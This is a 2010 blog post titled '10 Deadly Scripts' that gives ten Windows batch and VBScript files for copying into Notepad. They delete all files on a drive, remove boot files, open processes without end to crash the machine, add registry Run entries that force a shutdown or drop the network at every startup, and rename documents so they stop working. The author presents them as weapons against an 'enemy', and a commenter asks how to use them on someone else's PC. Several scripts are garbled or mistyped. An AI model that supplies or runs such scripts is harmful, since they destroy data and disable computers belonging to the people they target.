Popular Posts

10 Deadly Scripts !

Posted: Saturday, October 9, 2010 by Fyaz Ahmad in
2




Warning : Please Use ALL At Your Own Risk.Never Try On Your Own Pc
Let Your Enemy See Your Power

Now below i am posting some codes which are known as "Deadly"

All Scripts Here Are To Be Copied In NotePad


#1.This Will Delete All The Content Of A Drive

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

#2.This Will Just Restart Your Pc

@echo off
shutdown -r -f -t 00

Save The Above Code As Anything.bat


#3.This Will Crash Ur Computer
.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
.
Save It As Anything.vbs
It Only Works With Windows XP

#4.

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
.
Save It As Anything.bat
No Idea About The After Effects OF This Virus

#5.The Most Simple Virus To Crush The Window
.
@Echo off
Del C:\ *.* |y
.
Save It As Anything.bat

#6.This will crash ur computer

: loop
start cmd.exe
goto loop
.
Save As Anything.bat

#7.Script that crashes pc
.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

#8.Shutdowns Computer Everytime It Is Turned On
.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

#9.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

#10.Change Files To Non-working TXT Files

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

2 comments:

  1. Anonymous says:

    Good stuff...

  1. METALHEAD ()oo() says:

    but how can this be used agains someone not on my PC !!! ??

Related Posts with Thumbnails